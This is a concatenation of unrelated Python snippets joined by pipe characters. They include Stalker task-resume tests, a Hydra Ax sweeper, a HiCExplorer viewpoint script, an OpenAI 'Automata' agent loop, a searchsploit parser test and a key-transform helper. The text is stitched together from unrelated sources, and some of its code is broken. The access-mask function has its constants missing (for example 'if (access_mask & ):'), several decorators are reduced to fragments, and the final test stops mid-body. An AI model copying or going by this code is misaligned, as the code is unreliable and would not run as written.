assert (str(cm.value) == 'Test Task 3 (id:37) is a WIP task, and it is not suitable to be resumed, please supply an OH or STOP task')
def test_resume_in_PREV_leaf_task(self):
self.test_task3.status = self.status_prev
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.resume()
assert (str(cm.value) == 'Test Task 3 (id:37) is a PREV task, and it is not suitable to be resumed, please supply an OH or STOP task')
def test_resume_in_HREV_leaf_task(self):
self.test_task3.status = self.status_hrev
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.resume()
assert (str(cm.value) == 'Test Task 3 (id:37) is a HREV task, and it is not suitable to be resumed, please supply an OH or STOP task')
def test_resume_in_DREV_leaf_task(self):
self.test_task3.status = self.status_drev
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.resume()
assert (str(cm.value) == 'Test Task 3 (id:37) is a DREV task, and it is not suitable to be resumed, please supply an OH or STOP task')
def test_resume_in_OH_leaf_task_with_no_dependencies(self):
self.test_task3.status = self.status_oh
self.test_task3.depends = []
self.test_task3.resume()
assert (self.test_task3.status == self.status_rts)
def test_resume_in_OH_leaf_task_with_STOP_dependencies(self):
self.test_task3.status = self.status_rts
self.test_task9.status = self.status_rts
self.test_task9.depends = [self.test_task3]
self.test_task3.status = self.status_stop
self.test_task9.status = self.status_oh
self.test_task9.resume()
assert (self.test_task9.status == self.status_wip)
def test_resume_in_OH_leaf_task_with_CMPL_dependencies(self):
self.test_task3.status = self.status_rts
self.test_task9.status = self.status_rts
self.test_task9.depends = [self.test_task3]
self.test_task3.status = self.status_cmpl
self.test_task9.status = self.status_oh
self.test_task9.resume()
assert (self.test_task9.status == self.status_wip)
def test_resume_in_STOP_leaf_task_with_no_dependencies(self):
self.test_task3.status = self.status_stop
self.test_task3.depends = []
self.test_task3.resume()
assert (self.test_task3.status == self.status_rts)
def test_resume_in_STOP_leaf_task_with_STOP_dependencies(self):
self.test_task3.status = self.status_rts
self.test_task9.status = self.status_rts
self.test_task9.depends = [self.test_task3]
self.test_task3.status = self.status_stop
self.test_task9.status = self.status_stop
self.test_task9.resume()
assert (self.test_task9.status == self.status_wip)
def test_resume_in_STOP_leaf_task_with_CMPL_dependencies(self):
self.test_task3.status = self.status_rts
self.test_task9.status = self.status_rts
self.test_task9.depends = [self.test_task3]
self.test_task3.status = self.status_cmpl
self.test_task9.status = self.status_stop
self.test_task9.resume()
assert (self.test_task9.status == self.status_wip)
def test_resume_in_CMPL_leaf_task(self):
self.test_task3.status = self.status_drev
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.resume()
assert (str(cm.value) == 'Test Task 3 (id:37) is a DREV task, and it is not suitable to be resumed, please supply an OH or STOP task')
def test_review_set_review_number_is_not_an_integer(self):
with pytest.raises(TypeError) as cm:
self.test_task3.review_set('not an integer')
assert (str(cm.value) == 'review_number argument in Task.review_set should be a positive integer, not str')
def test_review_set_review_number_is_a_negative_integer(self):
with pytest.raises(TypeError) as cm:
self.test_task3.review_set((- 10))
assert (str(cm.value) == 'review_number argument in Task.review_set should be a positive integer, not -10')
def test_review_set_review_number_is_zero(self):
with pytest.raises(TypeError) as cm:
self.test_task3.review_set(0)
assert (str(cm.value) == 'review_number argument in Task.review_set should be a positive integer, not 0')
def test_leaf_DREV_task_with_no_dependency_and_no_timelogs_update_status_with_dependent_statuses_fixes_status(self):
self.test_task5.depends = []
self.test_task5.status = self.status_drev
assert (self.status_drev == self.test_task5.status)
self.test_task5.update_status_with_dependent_statuses()
assert (self.status_rts == self.test_task5.status)
def test_leaf_DREV_task_with_no_dependency_but_with_timelogs_update_status_with_dependent_statuses_fixes_status(self):
self.test_task5.depends = []
dt = datetime.datetime
td = datetime.timedelta
now = dt.now(pytz.utc)
self.test_task5.create_time_log(resource=self.test_task5.resources[0], start=now, end=(now + td(hours=1)))
self.test_task5.status = self.status_drev
assert (self.status_drev == self.test_task5.status)
self.test_task5.update_status_with_dependent_statuses()
assert (self.status_wip == self.test_task5.status)
def test_leaf_WIP_task_with_no_dependency_and_no_timelogs_update_status_with_dependent_statuses_fixes_status(self):
self.test_task5.depends = []
assert (self.test_task5.time_logs == [])
self.test_task5.status = self.status_wip
assert (self.status_wip == self.test_task5.status)
self.test_task5.update_status_with_dependent_statuses()
assert (self.status_rts == self.test_task5.status) |
class AppModuleGroup():
def __init__(self, *modules: AppModule):
self.modules = modules
def module(self, import_name: str, name: str, template_folder: Optional[str]=None, template_path: Optional[str]=None, static_folder: Optional[str]=None, static_path: Optional[str]=None, url_prefix: Optional[str]=None, hostname: Optional[str]=None, cache: Optional[RouteCacheRule]=None, root_path: Optional[str]=None, module_class: Optional[Type[AppModule]]=None, **kwargs: Any) -> AppModulesGrouped:
module_class = (module_class or AppModule)
return module_class.from_module_group(self, import_name, name, template_folder=template_folder, template_path=template_path, static_folder=static_folder, static_path=static_path, url_prefix=url_prefix, hostname=hostname, cache=cache, root_path=root_path, opts=kwargs)
def route(self, paths: Optional[Union[(str, List[str])]]=None, name: Optional[str]=None, template: Optional[str]=None, **kwargs) -> RoutingCtxGroup:
return RoutingCtxGroup([mod.route(paths=paths, name=name, template=template, **kwargs) for mod in self.modules])
def websocket(self, paths: Optional[Union[(str, List[str])]]=None, name: Optional[str]=None, **kwargs):
return RoutingCtxGroup([mod.websocket(paths=paths, name=name, **kwargs) for mod in self.modules]) |
def mk_segtiles(tiles):
segtiles = {}
baseaddrs = {}
for (tile_name, tile) in tiles.items():
for (block_name, block) in tile['bits'].items():
baseaddrs.setdefault(block['baseaddr'], []).append((block['offset'], tile_name, block, block_name))
for (baseaddr, values) in baseaddrs.items():
values = sorted(values)
for (refi, (_ref_block_offset, ref_tile_name, ref_block, ref_block_name)) in enumerate(values):
seglets = segtiles.setdefault(ref_tile_name, [])
ref_as = (ref_block['offset'], ((ref_block['offset'] + ref_block['words']) - 1))
for cmpi in range((refi + 1), len(values)):
(_cmp_block_offset, cmp_tile_name, cmp_block, cmp_block_name) = values[cmpi]
cmp_as = (cmp_block['offset'], ((cmp_block['offset'] + cmp_block['words']) - 1))
if overlap(ref_as, cmp_as):
seglets.append((cmp_tile_name, cmp_block_name))
else:
break
return segtiles |
def render_plugin(values) -> jinja2.Template:
env = jinja2.Environment(loader=jinja2.FileSystemLoader(os.path.join(os.path.dirname(__file__), 'templates')), auto_reload=False, keep_trailing_newline=True, autoescape=True)
template = env.get_template('new_plugin.py.tmpl')
return template.render(**values) |
class DefinitionsTransform(SphinxTransform):
default_priority = 500
def apply(self):
for kind in KINDS:
storage = get_storage(self.env, kind)
for node in self.document.findall(DefIdNode):
if (node['def_kind'] != kind.NAME):
continue
item = storage[node['def_id']]
kind.replace_id_node(self.app, node, item)
for node in self.document.findall(DefRefNode):
if (node['ref_kind'] != kind.NAME):
continue
if (node['ref_target'] in storage):
item = storage[node['ref_target']]
node.replace_self(sphinx.util.nodes.make_refnode(self.app.builder, node['ref_source_doc'], item.document, item.anchor(), kind.create_ref_node(self.env, node['ref_text'], item)))
else:
new = nodes.inline('', '', kind.create_ref_node(self.env, node['ref_text'], None))
new['classes'].append('spec-missing-ref')
node.replace_self(new) |
def train_model(train_file, eval_file, scale, output_dir):
train_dataset = TrainAugmentDataset(train_file, scale=scale)
val_dataset = EvalDataset(eval_file)
training_args = TrainingArguments(output_dir=output_dir, num_train_epochs=1000)
config = A2nConfig(scale=scale)
model = A2nModel(config)
trainer = Trainer(model=model, args=training_args, train_dataset=train_dataset, eval_dataset=val_dataset)
trainer.train() |
class TestGeneratorInsertRouterPath():
def test_should_insert_router_import(self, monkeypatch, fake_project, fake_router):
monkeypatch.chdir(fake_project['root'])
insert_router_import('fake_project', 'fake_router')
insert_router_import('fake_project', 'fake_router')
assert (fake_router.read_text() == router_expected)
def test_should_insert_router_import_at_file_end(self, monkeypatch, fake_project, fake_router2):
monkeypatch.chdir(fake_project['root'])
insert_router_import('fake_project', 'fake_router')
insert_router_import('fake_project', 'fake_router')
assert (fake_router2.read_text() == router2_expected) |
class BaseTest(unittest.TestCase):
def __str__(self):
return self.id().replace('.runTest', '')
def setUp(self):
oftest.open_logfile(str(self))
logging.info(('** START TEST CASE ' + str(self)))
def tearDown(self):
logging.info(('** END TEST CASE ' + str(self))) |
class OnlyExecutableFilter():
def __init__(self, parent):
self.parent = parent
def update(self):
pass
def filter(self, tasks):
filtered_tasks = []
execution_flags = [64, 16, 32, 128]
for task in tasks:
for segment in task.segments:
if (segment.flags in execution_flags):
filtered_tasks.append(task)
break
logging.info('removed %d/%d dump tasks by removing non-executable tasks.', (len(tasks) - len(filtered_tasks)), len(tasks))
return filtered_tasks |
def _get_access_mask_string(access_mask, mappings, access_strings):
if (access_mask & ):
access_mask |= mappings[0]
if (access_mask & ):
access_mask |= mappings[1]
if (access_mask & ):
access_mask |= mappings[2]
if (access_mask & ):
access_mask |= mappings[3]
string = _get_mask_string(access_mask, access_strings, ', ')
if (string == ''):
return 'None 0x{:x}'.format(access_mask)
return string |
class OpenAIAutomataAgent(Agent):
ASSISTANT_INTRO: Final = "Hello, I am Automata, OpenAI's most skilled coding system. How may I assist you today?"
ASSISTANT_INITIALIZE_MESSAGE: Final = 'Thoughts:\\nFirst, I will initialize myself. Then I will continue on to carefully consider the user task and carry out the necessary actions.\\nAction:\\nI will call `initializer` to initialize myself.'
CONTINUE_PREFIX: Final = 'Continue...\n'
OBSERVATION_MESSAGE: Final = 'Observation:\n'
GENERAL_SUFFIX_TEMPLATE: Final = "STATUS NOTES\nYou have used {iteration_count} out of a maximum of {max_iterations} iterations.\nYou have used {estimated_tokens} out of a maximum of {max_tokens} tokens.\nYour instructions are '{user_instructions}'"
STOPPING_SUFFIX_TEMPLATE: Final = "STATUS NOTES:\nYOU HAVE EXCEEDED YOUR MAXIMUM ALLOWABLE ITERATIONS OR TOKENS, RETURN A RESULT NOW WITH call-termination.\nRECALL, YOUR INSTRUCTIONS WERE '{user_instructions}."
def __init__(self, user_instructions: str, config: OpenAIAutomataAgentConfig) -> None:
super().__init__(user_instructions)
self.config = config
self.iteration_count = 0
self.completed = False
self._conversation = OpenAIConversation()
self._setup()
def __iter__(self):
return self
def __repr__(self):
return f'OpenAIAutomataAgent(config={str(self.config)}, iteration_count={self.iteration_count}, completed={self.completed}, _conversation={str(self._conversation)})'
def __next__(self) -> LLMIterationResult:
if (self.completed or (self.iteration_count > self.config.max_iterations)):
raise AgentStopIterationError
logger.info(f'''
{('-' * 120)}
Latest Assistant Message --
''')
assistant_message = self.chat_provider.get_next_assistant_completion()
self.chat_provider.add_message(assistant_message)
if (not self.config.stream):
logger.info(f'''{assistant_message}
''')
logger.info(f'''
{('-' * 120)}''')
self.iteration_count += 1
user_message = self._get_next_user_response(assistant_message)
logger.info(f'''Latest User Message --
{user_message}
''')
self.chat_provider.add_message(user_message)
logger.info(f'''
{('-' * 120)}''')
return (assistant_message, user_message)
def conversation(self) -> LLMConversation:
return self._conversation
def agent_responses(self) -> List[LLMChatMessage]:
return [message for message in self._conversation.messages if (message.role == 'assistant')][(- self.iteration_count):]
def tools(self) -> Sequence[OpenAITool]:
tools = []
for tool in self.config.tools:
if (not isinstance(tool, OpenAITool)):
raise ValueError(f'Invalid tool type: {type(tool)}')
tools.append(tool)
tools.append(self._get_termination_tool())
return tools
def functions(self) -> List[OpenAIFunction]:
return [ele.openai_function for ele in self.tools]
def run(self) -> str:
if (not self._initialized):
raise AgentGeneralError('The agent has not been initialized.')
while True:
try:
next(self)
except AgentStopIterationError:
break
last_message = self._conversation.get_latest_message()
if ((not self.completed) and (self.iteration_count > self.config.max_iterations)):
raise AgentMaxIterError('The agent exceeded the maximum number of iterations.')
elif ((not self.completed) or (not isinstance(last_message, OpenAIChatMessage))):
raise AgentResultError('The agent did not produce a result.')
elif (not last_message.content):
raise AgentResultError('The agent produced an empty result.')
return last_message.content
def get_result(self) -> str:
if (not self.completed):
raise ValueError('The agent has not completed its instructions.')
if (result := self._conversation.get_latest_message().content):
return result
else:
raise ValueError('The agent did not produce a result.')
(max_retries=5)
def _get_next_user_response(self, assistant_message: OpenAIChatMessage) -> OpenAIChatMessage:
if (assistant_message.function_call and (assistant_message.function_call.name == 'error-occurred')):
error_msg = assistant_message.function_call.arguments['error']
logger.error(f'OpenAI API Error: {error_msg}')
raise OpenAPIError(error_msg)
if assistant_message.function_call:
if (validation_error := self._validate_function_call(assistant_message.function_call)):
return OpenAIChatMessage(role='user', content=validation_error)
if (not self.tool_executor.is_valid_tool(assistant_message.function_call.name)):
error_message = f"Error: The requested function '{assistant_message.function_call.name}' is not recognized."
return OpenAIChatMessage(role='user', content=error_message)
try:
result = self.tool_executor.execute(assistant_message.function_call)
function_iteration_message = ('' if self.completed else f'''
{self._get_iteration_status(result)}''')
return OpenAIChatMessage(role='user', content=f'''{OpenAIAutomataAgent.OBSERVATION_MESSAGE}{result}
{function_iteration_message}''')
except TypeError as te:
if ("'code'" in str(te)):
failure_message = f'Error was corrected during tool execution: {te}'
else:
failure_message = f'Tool execution failed: {te}'
logger.info(failure_message)
return OpenAIChatMessage(role='user', content=failure_message)
except Exception as e:
failure_message = 'Tool execution failed. Please try again or contact support for assistance.'
logger.error(f'Error during tool execution: {e}')
return OpenAIChatMessage(role='user', content=failure_message)
return OpenAIChatMessage(role='user', content=f'''{OpenAIAutomataAgent.CONTINUE_PREFIX}
{self._get_iteration_status()}''')
def _validate_function_call(self, function_call):
if (function_call.name == 'code'):
code_content = function_call.arguments.get('code', '')
function_call.arguments['result'] = f'''```
{code_content}
```'''
if ('code' in function_call.arguments):
del function_call.arguments['code']
function_call.name = 'call-termination'
logger.info(f'Corrected function call to: {function_call.name}')
elif (function_call.name == 'call_termination'):
function_call.name = 'call-termination'
logger.info(f'Corrected function call to: {function_call.name}')
if hasattr(function_call, 'message'):
return "Error: Extraneous field 'message' detected in function call."
return None
def _get_iteration_status(self, message_content: Optional[str]=None) -> str:
estimated_tokens_consumed = (self.chat_provider.approximate_tokens_consumed + (len(self.chat_provider.encoding.encode(message_content)) if message_content else 0))
if ((self.iteration_count != self.config.max_iterations) and (estimated_tokens_consumed < self.config.max_tokens)):
return OpenAIAutomataAgent.GENERAL_SUFFIX_TEMPLATE.format(iteration_count=self.iteration_count, max_iterations=self.config.max_iterations, max_tokens=self.config.max_tokens, estimated_tokens=estimated_tokens_consumed, user_instructions=f'{self.user_instructions[:200]}...')
else:
return OpenAIAutomataAgent.STOPPING_SUFFIX_TEMPLATE.format(user_instructions=f'{self.user_instructions[:200]}...')
def _setup(self) -> None:
logger.info(f'''Initializing with System Instruction --
{self.config.system_instruction}
And with User Instruction --
{self.user_instructions}
''')
self.chat_provider = OpenAIChatCompletionProvider(model=self.config.model, temperature=self.config.temperature, stream=self.config.stream, system_instruction=self.config.system_instruction, user_instruction=self.user_instructions, conversation=self._conversation, functions=self.functions)
self.tool_executor = ToolExecutor(ToolExecution(self.tools))
self._initialized = True
def _get_termination_tool(self) -> OpenAITool:
def terminate(result: str) -> str:
self.completed = True
return result
return OpenAITool(name='call-termination', description='Terminates the conversation.', properties={'result': {'type': 'string', 'description': 'The final result of the conversation.'}}, required=['result'], function=terminate) |
def main(args=None):
args = parse_arguments().parse_args(args)
viewpointObj = Viewpoint()
(referencePoints, gene_list) = viewpointObj.readReferencePointFile(args.referencePoints)
referencePointsPerThread = (len(referencePoints) // args.threads)
queue = ([None] * args.threads)
process = ([None] * args.threads)
background_model = viewpointObj.readBackgroundDataFile(args.backgroundModelFile, args.range, args.fixateRange)
background_model_mean_values = viewpointObj.readBackgroundDataFile(args.backgroundModelFile, args.range, args.fixateRange, pMean=True)
interactionFileH5Object = h5py.File(args.outFileName, 'w')
interactionFileH5Object.attrs['type'] = 'interactions'
interactionFileH5Object.attrs['version'] = __version__
interactionFileH5Object.attrs['range'] = args.range
interactionFileH5Object.attrs['averageContactBin'] = args.averageContactBin
interactionFileH5Object.attrs['fixateRange'] = args.fixateRange
fail_flag = False
fail_message = ''
matrix_collection = {}
resolution = 0
for matrix in args.matrices:
hic_ma = hm.hiCMatrix(matrix)
viewpointObj.hicMatrix = hic_ma
file_list_sample = ([None] * args.threads)
interaction_data_list_sample = ([None] * args.threads)
all_data_collected = False
if (resolution == 0):
resolution = hic_ma.getBinSize()
interactionFileH5Object.attrs['resolution'] = resolution
for i in range(args.threads):
if (i < (args.threads - 1)):
referencePointsThread = referencePoints[(i * referencePointsPerThread):((i + 1) * referencePointsPerThread)]
geneListThread = gene_list[(i * referencePointsPerThread):((i + 1) * referencePointsPerThread)]
else:
referencePointsThread = referencePoints[(i * referencePointsPerThread):]
geneListThread = gene_list[(i * referencePointsPerThread):]
if (len(referencePointsThread) == 0):
process[i] = None
queue[i] = None
file_list_sample[i] = []
continue
queue[i] = Queue()
process[i] = Process(target=compute_viewpoint, kwargs=dict(pViewpointObj=viewpointObj, pArgs=args, pQueue=queue[i], pReferencePoints=referencePointsThread, pGeneList=geneListThread, pMatrix=matrix, pBackgroundModel=background_model, pBackgroundModelRelativeInteractions=background_model_mean_values))
process[i].start()
while (not all_data_collected):
for i in range(args.threads):
if ((queue[i] is not None) and (not queue[i].empty())):
file_list_ = queue[i].get()
if ('Fail:' in file_list_):
fail_flag = True
fail_message = file_list_[6:]
interaction_data_list_sample[i] = file_list_
process[i].join()
process[i].terminate()
process[i] = None
all_data_collected = True
for i in range(args.threads):
if (process[i] is not None):
all_data_collected = False
time.sleep(1)
if fail_flag:
log.error(fail_message)
exit(1)
interaction_data_list = []
for sublist in interaction_data_list_sample:
if (sublist is not None):
for item in sublist:
interaction_data_list.append(item)
matrix_collection[matrix] = interaction_data_list
for matrix in matrix_collection:
matrixGroup = interactionFileH5Object.create_group(os.path.basename(matrix).split('.')[0])
geneGroup = matrixGroup.create_group('genes')
for (i, interaction_data) in enumerate(matrix_collection[matrix]):
if (interaction_data[1][0] not in matrixGroup):
chromosomeObject = matrixGroup.create_group(interaction_data[1][0])
group_name = viewpointObj.writeInteractionFileHDF5(chromosomeObject, interaction_data[1][3], interaction_data[1], referencePoints[i][1:])
try:
geneGroup[group_name] = chromosomeObject[group_name]
except Exception as e:
log.debug(str(e))
log.debug('group_name {}'.format(group_name))
log.debug('gene name {}'.format(interaction_data[1][3])) |
class CoreAxSweeper(Sweeper):
def __init__(self, ax_config: AxConfig, max_batch_size: Optional[int]):
self.config: Optional[DictConfig] = None
self.launcher: Optional[Launcher] = None
self.hydra_context: Optional[HydraContext] = None
self.job_results = None
self.experiment: ExperimentConfig = ax_config.experiment
self.early_stopper: EarlyStopper = EarlyStopper(max_epochs_without_improvement=ax_config.early_stop.max_epochs_without_improvement, epsilon=ax_config.early_stop.epsilon, minimize=ax_config.early_stop.minimize)
self.ax_client_config: ClientConfig = ax_config.client
self.max_trials = ax_config.max_trials
self.ax_params: DictConfig = OmegaConf.create({})
if hasattr(ax_config, 'params'):
self.ax_params.update(ax_config.params)
self.sweep_dir: str
self.job_idx: Optional[int] = None
self.max_batch_size = max_batch_size
self.is_noisy: bool = ax_config.is_noisy
def setup(self, *, hydra_context: HydraContext, task_function: TaskFunction, config: DictConfig) -> None:
self.config = config
self.hydra_context = hydra_context
self.launcher = Plugins.instance().instantiate_launcher(config=config, hydra_context=hydra_context, task_function=task_function)
self.sweep_dir = config.hydra.sweep.dir
def sweep(self, arguments: List[str]) -> None:
self.job_idx = 0
ax_client = self.setup_ax_client(arguments)
num_trials_left = self.max_trials
max_parallelism = ax_client.get_max_parallelism()
current_parallelism_index = 0
is_search_space_exhausted = False
best_parameters = {}
while ((num_trials_left > 0) and (not is_search_space_exhausted)):
current_parallelism = max_parallelism[current_parallelism_index]
(num_trials, max_parallelism_setting) = current_parallelism
num_trials_so_far = 0
while (((num_trials > num_trials_so_far) or (num_trials == (- 1))) and (num_trials_left > 0)):
trial_batch = get_one_batch_of_trials(ax_client=ax_client, parallelism=current_parallelism, num_trials_so_far=num_trials_so_far, num_max_trials_to_do=num_trials_left)
list_of_trials_to_launch = trial_batch.list_of_trials[:num_trials_left]
is_search_space_exhausted = trial_batch.is_search_space_exhausted
log.info('AxSweeper is launching {} jobs'.format(len(list_of_trials_to_launch)))
self.sweep_over_batches(ax_client=ax_client, list_of_trials=list_of_trials_to_launch)
num_trials_so_far += len(list_of_trials_to_launch)
num_trials_left -= len(list_of_trials_to_launch)
(best_parameters, predictions) = ax_client.get_best_parameters()
metric = predictions[0][ax_client.objective_name]
if self.early_stopper.should_stop(metric, best_parameters):
num_trials_left = (- 1)
break
if is_search_space_exhausted:
log.info('Ax has exhausted the search space')
break
current_parallelism_index += 1
results_to_serialize = {'optimizer': 'ax', 'ax': best_parameters}
OmegaConf.save(OmegaConf.create(results_to_serialize), f'{self.sweep_dir}/optimization_results.yaml')
log.info(('Best parameters: ' + str(best_parameters)))
def sweep_over_batches(self, ax_client: AxClient, list_of_trials: List[Trial]) -> None:
assert (self.launcher is not None)
assert (self.job_idx is not None)
chunked_batches = self.chunks(list_of_trials, self.max_batch_size)
for batch in chunked_batches:
overrides = [x.overrides for x in batch]
self.validate_batch_is_legal(overrides)
rets = self.launcher.launch(job_overrides=overrides, initial_job_idx=self.job_idx)
self.job_idx += len(rets)
for idx in range(len(batch)):
val: Any = rets[idx].return_value
assert isinstance(val, (int, float, tuple, dict))
if isinstance(val, (int, float)):
if self.is_noisy:
val = (val, None)
else:
val = (val, 0)
ax_client.complete_trial(trial_index=batch[idx].trial_index, raw_data=val)
def setup_ax_client(self, arguments: List[str]) -> AxClient:
parameters: List[Dict[(Any, Any)]] = []
for (key, value) in self.ax_params.items():
param = OmegaConf.to_container(value, resolve=True)
assert isinstance(param, Dict)
if (param['type'] == 'range'):
bounds = param['bounds']
if (not all((isinstance(x, int) for x in bounds))):
param['bounds'] = [float(x) for x in bounds]
parameters.append(param)
parameters[(- 1)]['name'] = key
commandline_params = self.parse_commandline_args(arguments)
for cmd_param in commandline_params:
for param in parameters:
if (param['name'] == cmd_param['name']):
for (key, value) in cmd_param.items():
param[key] = value
break
else:
parameters.append(cmd_param)
log.info(f'AxSweeper is optimizing the following parameters: {encoder_parameters_into_string(parameters)}')
ax_client = AxClient(verbose_logging=self.ax_client_config.verbose_logging, random_seed=self.ax_client_config.random_seed)
ax_client.create_experiment(parameters=parameters, **self.experiment)
return ax_client
def parse_commandline_args(self, arguments: List[str]) -> List[Dict[(str, Union[(ax_types.TParamValue, List[ax_types.TParamValue])])]]:
parser = OverridesParser.create()
parsed = parser.parse_overrides(arguments)
parameters: List[Dict[(str, Any)]] = []
for override in parsed:
if override.is_sweep_override():
if override.is_choice_sweep():
param = create_choice_param_from_choice_override(override)
elif override.is_range_sweep():
param = create_choice_param_from_range_override(override)
elif override.is_interval_sweep():
param = create_range_param_using_interval_override(override)
elif (not override.is_hydra_override()):
param = create_fixed_param_from_element_override(override)
parameters.append(param)
return parameters
def chunks(batch: List[Any], n: Optional[int]) -> Iterable[List[Any]]:
if (n is None):
n = len(batch)
if (n < 1):
raise ValueError('n must be an integer greater than 0')
for i in range(0, len(batch), n):
(yield batch[i:(i + n)]) |
def test_rename_var():
string = write_rpc_request(1, 'initialize', {'rootPath': str(test_dir)})
file_path = (test_dir / 'test_prog.f08')
string += rename_request('str_rename', file_path, 5, 25)
(errcode, results) = run_request(string)
assert (errcode == 0)
ref = {}
ref[path_to_uri(str(file_path))] = [create('str_rename', 5, 20, 5, 29)]
check_rename_response(results[1]['changes'], ref) |
.parametrize('test_input, expected', [('fullpath', False), ('paged', False)])
def test_searchsploit_results_parser_defaults(test_input, expected):
parsed = searchsploit_results_parser.parse_known_args(['FullScan', '--target-file', 'required'])[0]
assert (getattr(parsed, test_input) == expected) |
class MWizard(HasTraits):
def next(self):
page = self.controller.get_next_page(self.controller.current_page)
self._show_page(page)
def previous(self):
page = self.controller.get_previous_page(self.controller.current_page)
self._show_page(page)
return
def _create_contents(self, parent):
super()._create_contents(parent)
self._initialize_controller(self.controller)
self._show_page(self.controller.get_first_page())
return
def _show_page(self, page):
self.controller.current_page = page
def _update(self, event):
pass
def _initialize_controller(self, controller):
controller.observe(self._update, 'complete')
controller.observe(self._on_current_page_changed, 'current_page')
return
def _on_current_page_changed(self, event):
if (event.old is not None):
event.old.observe(self._update, 'complete', remove=True)
if (event.new is not None):
event.new.observe(self._update, 'complete')
self._update(event=None)
def _on_closed_changed(self):
self.controller.dispose_pages()
return |
class StreamOutput(Text):
def __init__(self, master):
super().__init__(master)
self.buffer = []
self.tag_configure('err', foreground='red')
def install(self):
self.__enter__()
return
def unistall(self):
self.__exit__()
return
def __enter__(self):
stderr_proxy = util.ShadowProxy(proxy_for=self)
stderr_proxy.divert_access('write', 'write_err')
(self.stdout, sys.stdout) = (sys.stdout, self)
(self.stderr, sys.stderr) = (sys.stderr, stderr_proxy)
return self
def __exit__(self, *args):
self.flush()
sys.stdout = self.stdout
sys.stderr = self.stderr
def clear(self):
self.delete(1.0, END)
def write(self, s):
self.buffer.append(s)
if s.endswith('\n'):
self.flush()
def write_err(self, s):
self.insert('end', s, 'err')
self.see('end')
def flush(self):
for elem in self.buffer:
self.insert('end', elem)
self.buffer = []
self.see('end')
return |
class SecretsManagerService(abc.ABC):
def create_secret(self, secret_name: str, secret_value: str, tags: Optional[Dict[(str, str)]]=None) -> str:
pass
def get_secret(self, secret_id: str) -> StringSecret:
pass
async def create_secret_async(self, secret_name: str, secret_value: str, tags: Optional[Dict[(str, str)]]=None) -> str:
pass
async def get_secret_async(self, secret_id: str) -> StringSecret:
pass
def delete_secret(self, secret_id: str) -> None:
pass
async def delete_secret_async(self, secret_id: str) -> None:
pass |
def _parse_meta_data(meta_data_string: str) -> dict[(str, ((str | bool) | int))]:
try:
meta_data_string = meta_data_string.replace("\\'", "'")
meta_data = yaml.safe_load(f"{{{meta_data_string.replace('=', ': ')}}}")
assert isinstance(meta_data, dict)
return meta_data
except (ParserError, AssertionError):
logging.warning(f"Malformed meta string '{meta_data_string}'")
return {} |
def K_to_K_tilda_str(K):
emsg1 = 'K_to_K_tilda K len is {}. it should be {}'.format(len(K), Ar_KEY_LEN)
assert (len(K) == Ar_KEY_LEN), emsg1
emsg2 = 'K_to_K_tilda K type is {}. it should be {}'.format(type(K), str)
assert (type(K) == str), emsg2
K_tilda = ''
K_tilda += chr(((ord(K[0]) + 233) % 256))
K_tilda += chr((ord(K[1]) ^ 229))
K_tilda += chr(((ord(K[2]) + 223) % 256))
K_tilda += chr((ord(K[3]) ^ 193))
K_tilda += chr(((ord(K[4]) + 179) % 256))
K_tilda += chr((ord(K[5]) ^ 167))
K_tilda += chr(((ord(K[6]) + 149) % 256))
K_tilda += chr((ord(K[7]) ^ 131))
K_tilda += chr((ord(K[8]) ^ 233))
K_tilda += chr(((ord(K[9]) + 229) % 256))
K_tilda += chr((ord(K[10]) ^ 223))
K_tilda += chr(((ord(K[11]) + 193) % 256))
K_tilda += chr((ord(K[12]) ^ 179))
K_tilda += chr(((ord(K[13]) + 167) % 256))
K_tilda += chr((ord(K[14]) ^ 149))
K_tilda += chr(((ord(K[15]) + 131) % 256))
log.debug('K_to_K_tilda_str: {}'.format(K_tilda.encode('hex')))
return K_tilda |
_figures_equal(extensions=['png'])
def test_plot_hist(fig_test, fig_ref):
test_data = TestData()
pd_flights = test_data.pd_flights()[['DistanceKilometers', 'DistanceMiles', 'FlightDelayMin', 'FlightTimeHour']]
ed_flights = test_data.ed_flights()[['DistanceKilometers', 'DistanceMiles', 'FlightDelayMin', 'FlightTimeHour']]
with pytest.warns(UserWarning):
pd_ax = fig_ref.subplots()
pd_flights.hist(ax=pd_ax)
with pytest.warns(UserWarning):
ed_ax = fig_test.subplots()
ed_flights.hist(ax=ed_ax) |
def expire_invitations():
from frappe.utils import add_days, now
days = 3
invitations_to_expire = frappe.db.get_all('GP Invitation', filters={'status': 'Pending', 'creation': ['<', add_days(now(), (- days))]})
for invitation in invitations_to_expire:
invitation = frappe.get_doc('GP Invitation', invitation.name)
invitation.status = 'Expired'
invitation.save(ignore_permissions=True) |
def validate_model(model, val_loader):
print('Validating the model')
model.eval()
y_true = []
y_pred = []
fnames = []
running_loss = 0.0
criterion = nn.CrossEntropyLoss()
with torch.no_grad():
for (step, (mfcc, lid, lengths, fname)) in enumerate(val_loader):
(sorted_lengths, indices) = torch.sort(lengths.view((- 1)), dim=0, descending=True)
sorted_lengths = sorted_lengths.long().numpy()
(mfcc, lid) = (mfcc[indices], lid[indices])
(mfcc, lid) = (Variable(mfcc), Variable(lid))
(mfcc, lid) = (mfcc.cuda(), lid.cuda().long())
logits = model(mfcc, sorted_lengths)
loss = criterion(logits, lid.long())
running_loss += loss.item()
targets = lid.cpu().view((- 1)).numpy()
y_true += targets.tolist()
predictions = return_classes(logits)
y_pred += predictions.tolist()
fnames += fname
ff = open((exp_dir + '/eval'), 'a')
assert (len(fnames) == len(y_pred))
for (f, yp, yt) in list(zip(fnames, y_pred, y_true)):
if (yp == yt):
continue
ff.write((((((f + ' ') + str(yp)) + ' ') + str(yt)) + '\n'))
ff.close()
averaged_loss = (running_loss / len(val_loader))
recall = get_metrics(y_pred, y_true)
log_value('Unweighted Recall per epoch', recall, global_epoch)
log_value('validation loss (per epoch)', averaged_loss, global_epoch)
print('Validation Loss: ', averaged_loss)
print('Unweighted Recall for the validation set: ', recall)
print('\n')
return (recall, model) |
.parametrize('toc_file', ('_toc_numbered.yml', '_toc_numbered_depth.yml', '_toc_numbered_parts.yml', '_toc_numbered_parts_subset.yml', '_toc_numbered_depth_parts_subset.yml'))
def test_toc_numbered_multitoc_numbering_false(toc_file, cli, build_resources, file_regression):
(books, tocs) = build_resources
